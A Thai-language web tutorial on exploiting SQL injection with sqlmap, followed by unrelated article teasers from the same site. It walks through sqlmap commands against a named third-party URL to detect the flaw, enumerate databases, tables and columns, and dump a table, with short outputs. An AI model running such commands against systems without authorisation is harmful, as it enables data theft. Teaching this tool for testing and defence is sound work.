ในส่วนนี้ LuckyTemplates จะแนะนำเครื่องมือบางอย่างที่ใช้ในการใช้ประโยชน์จากSQL Injection
ปัจจุบันมีเครื่องมือสแกนช่องโหว่ด้านความปลอดภัยมากมาย (รวมถึงการแทรก SQL) เครื่องมือเหล่านี้ช่วยให้สามารถตรวจจับและใช้ประโยชน์จากช่องโหว่ของการแทรก SQL ได้ค่อนข้างแข็งแกร่ง เครื่องมือหาประโยชน์จากช่องโหว่การฉีด SQL อัตโนมัติที่ใช้กันทั่วไปบางส่วน ได้แก่:
นอกจากนี้ยังมีเครื่องมืออื่นๆ ที่คุณสามารถอ้างอิงได้ เช่น Netsparker, jSQL Injection, Burp, BBQSQL...
ด้านล่างนี้เป็นการสาธิตการใช้ Sqlmap เพื่อใช้ประโยชน์จากการฉีด SQL พื้นฐาน
คุณดาวน์โหลด Sqlmap ได้ที่ http://sqlmap.org/
Sqlmap เขียนด้วยภาษา Python ดังนั้นหากต้องการใช้เครื่องมือนี้ คุณจะต้องติดตั้ง Python คุณสามารถดาวน์โหลด python ได้ที่ http://www.python.org/downloads/
ก่อนอื่น คุณต้องระบุเว็บไซต์เป้าหมาย ที่นี่ฉันมีเป้าหมายต่อไปนี้: http://zerocoolhf.altervista.org/level1.php?id=1 (หน้านี้ปิดให้บริการแล้ว)
ขั้นตอนที่ 1 : เปิด cmd แล้วพิมพ์คำสั่งต่อไปนี้:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap จะตรวจจับช่องโหว่ของเป้าหมายและให้ข้อมูลเกี่ยวกับช่องโหว่
ขั้นตอนที่ 2 : เมื่อเราพิจารณาแล้วว่าเว็บไซต์เป้าหมายมีช่องโหว่ในการแทรก SQL เราจะดำเนินการค้นหาชื่อฐานข้อมูลต่อไป
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> ฐานข้อมูล: my_zerocoolhf
ขั้นตอนที่ 3 : หลังจากกำหนดชื่อฐานข้อมูลแล้ว เราจะดำเนินการค้นหาชื่อของตารางในฐานข้อมูลต่อไป
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> มี 2 ตารางในฐานข้อมูล: auth และ book
ขั้นตอนที่ 4 : กำหนดชื่อของคอลัมน์ในตาราง
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> ระบุคอลัมน์ในตารางหนังสือ: ผู้แต่ง, รหัส, ราคา, ชื่อเรื่อง
ขั้นตอนที่ 5 : ดัมพ์ข้อมูลจากตาราง
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> เราก็ได้ฐานข้อมูลของเว็บไซต์เป้าหมายแล้ว
ด้านบนเป็นการสาธิตพื้นฐานของการใช้ sqlmap เพื่อใช้ประโยชน์จากข้อผิดพลาดในการฉีด SQL คุณสามารถเรียนรู้เพิ่มเติมเกี่ยวกับตัวเลือก sqlmap ได้ที่ https://github.com/sqlmapproject/sqlmap/wiki/Usage เพื่อรองรับการหาประโยชน์ การหาประโยชน์จากการฉีด SQL
ล่าสุด Microsoft เปิดตัวการอัปเดตสะสมล่าสุดสำหรับผู้ใช้พีซี Windows 10 ที่เรียกว่า Build 14393.222 การอัปเดตนี้เผยแพร่สำหรับ Windows 10 โดยส่วนใหญ่จะแก้ไขจุดบกพร่องตามคำติชมของผู้ใช้ และปรับปรุงประสบการณ์ด้านประสิทธิภาพของระบบปฏิบัติการ
คุณมีคอมพิวเตอร์บนเครือข่ายท้องถิ่นที่ต้องการการเข้าถึงจากภายนอกหรือไม่? การใช้โฮสต์ป้อมปราการเป็นผู้ดูแลเครือข่ายของคุณอาจเป็นทางออกที่ดี
หากคุณต้องการใช้แป้นพิมพ์คลาสสิกรุ่นเก่า เช่น IBM Model M ที่ไม่มีคีย์ Windows มาให้ มีวิธีง่ายๆ ในการเพิ่มคีย์เพิ่มเติมโดยการยืมคีย์ที่คุณไม่ได้ใช้บ่อย
บางครั้งคุณอาจต้องลบบันทึกเหตุการณ์เก่าทั้งหมดพร้อมกัน ในคู่มือนี้ Quantrimang.com จะแสดง 3 วิธีในการลบบันทึกเหตุการณ์ทั้งหมดใน Windows 10 Event Viewer อย่างรวดเร็ว
ในบทความก่อนหน้านี้หลายบทความ เราได้กล่าวไว้ว่าการไม่เปิดเผยตัวตนทางออนไลน์เป็นสิ่งสำคัญอย่างยิ่ง ข้อมูลส่วนตัวรั่วไหลทุกปี ทำให้การรักษาความปลอดภัยออนไลน์มีความจำเป็นมากขึ้น นั่นคือเหตุผลที่เราควรใช้ที่อยู่ IP เสมือน ด้านล่างนี้เราจะเรียนรู้เกี่ยวกับวิธีการสร้าง IP ปลอม!
WindowTop เป็นเครื่องมือที่มีความสามารถในการหรี่หน้าต่างแอปพลิเคชันและโปรแกรมทั้งหมดที่ทำงานบนคอมพิวเตอร์ Windows 10 หรือคุณสามารถใช้อินเทอร์เฟซพื้นหลังสีเข้มบน windows ได้
แถบภาษาบน Windows 8 เป็นแถบเครื่องมือภาษาขนาดเล็กที่ออกแบบมาเพื่อแสดงบนหน้าจอเดสก์ท็อปโดยอัตโนมัติ อย่างไรก็ตาม หลายๆ คนต้องการซ่อนแถบภาษานี้บนทาสก์บาร์
การเชื่อมต่อไร้สายถือเป็นสิ่งจำเป็นในปัจจุบัน และด้วยเหตุนี้ การรักษาความปลอดภัยแบบไร้สายจึงถือเป็นสิ่งสำคัญในการรับรองความปลอดภัยในเครือข่ายภายในของคุณ
การเพิ่มความเร็วอินเทอร์เน็ตให้สูงสุดถือเป็นสิ่งสำคัญในการเพิ่มประสิทธิภาพการเชื่อมต่อเครือข่ายของคุณ คุณสามารถมีความบันเทิงและประสบการณ์การทำงานที่ดีที่สุดโดยใช้คอมพิวเตอร์ ทีวีที่เชื่อมต่ออินเทอร์เน็ต เครื่องเล่นเกม ฯลฯ
หากคุณกำลังแชร์คอมพิวเตอร์กับเพื่อนหรือสมาชิกในครอบครัว หรือจัดการคอมพิวเตอร์หลายเครื่องโดยเฉพาะ คุณอาจเผชิญกับสถานการณ์ที่ไม่พึงประสงค์ซึ่งคุณต้องการเตือนพวกเขาด้วยบันทึกย่อก่อนที่พวกเขาจะเข้าสู่ระบบคอมพิวเตอร์ต่อไป
